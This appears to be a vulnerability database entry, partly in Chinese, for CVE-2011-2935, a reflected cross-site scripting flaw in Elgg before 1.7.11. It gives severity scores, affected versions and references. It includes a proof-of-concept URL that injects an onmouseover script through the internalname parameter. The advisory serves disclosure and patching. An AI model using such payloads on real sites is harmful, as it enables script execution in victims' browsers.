CVE-2011-2935
MEDIUM6.1EPSS 0.31%Elgg Reflected XSS Vulnerability
發布日:2022/4/22修改日:2024/1/12
描述
### VULNERABILITY DESCRIPTION The `internalname` parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser ### PROOF-OF-CONCEPT/EXPLOIT ```http http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22 ```
受影響套件(1)
- Packagist/elgg/elggfrom 0, < 1.7.11
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM6.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
參考連結(8)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2011-2935
- PATCHhttps://github.com/Elgg/Elgg
- WEBhttps://github.com/Elgg/Elgg/commit/2843b4f846874d434a2403ac1f27e41035b45e04
- WEBhttps://github.com/Elgg/Elgg/issues/3544
- WEBhttps://oss-security.openwall.narkive.com/1UH3NYx8/cve-request-elgg-1-7-10-multiple-vulnerabilities
- WEBhttps://security-tracker.debian.org/tracker/CVE-2011-2935
- WEBhttps://web.archive.org/web/20110907122607/http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released
- WEBhttp://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin